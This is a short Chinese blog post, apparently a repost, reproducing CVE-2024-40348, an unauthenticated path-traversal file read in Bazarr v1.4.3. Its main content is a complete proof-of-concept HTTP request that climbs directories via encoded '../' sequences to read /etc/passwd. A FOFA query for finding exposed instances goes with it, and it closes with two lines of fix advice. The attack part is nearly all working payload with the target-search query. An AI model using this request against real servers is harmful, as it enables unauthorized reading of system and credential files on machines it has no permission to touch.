热门标签
热门文章
- 1ARM Trusted Firmware User Guide_linux-firmware20220411
- 2MySQL8版本升级(RPM包)8.0.11升级到8.0.25_mysql 8.0.11 升级
- 3mysql主从同步恢复数据_如何恢復MySQL主从数据一致性
- 4疯了、Spring 惊奇大漏洞。。。_spring反序列化 漏洞
- 5工业镜头与普通镜头有什么区别?
- 6prometheus变量_Prometheus配置文件说明
- 7esxi硬盘卸载_esxi 删除硬盘
- 8Word2Vec导学第二部分 - 负采样_word2vec负采样例子
- 9ChatGLM2-6B部署_chatglm2-6b 部署
- 10自己做的一个用于生成DICOM文件的服务器
当前位置: article > 正文
Bazaar v1.4.3 任意文件读取漏洞复现(CVE-2024-40348)
作者:笔触狂放9 | 2024-08-19 09:48:51
赞
踩
bazaar v1.4.3
0x01 产品简介
Bazarr是Sonarr和Radarr的配套应用程序,可根据您的要求管理和下载字幕。
0x02 漏洞概述
Bazarr存在任意文件读取漏洞,该漏洞是由于Bazaar v1.4.3的组件/api/swaggerui/static中存在一个问题,允许未经身份验证的攻击者可利用该漏洞执行目录遍历。
0x03 复现环境
FOFA:title="Bazarr"
0x04 漏洞复现
PoC
- GET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
- Host:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Connection: close
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/1001752
推荐阅读
相关标签
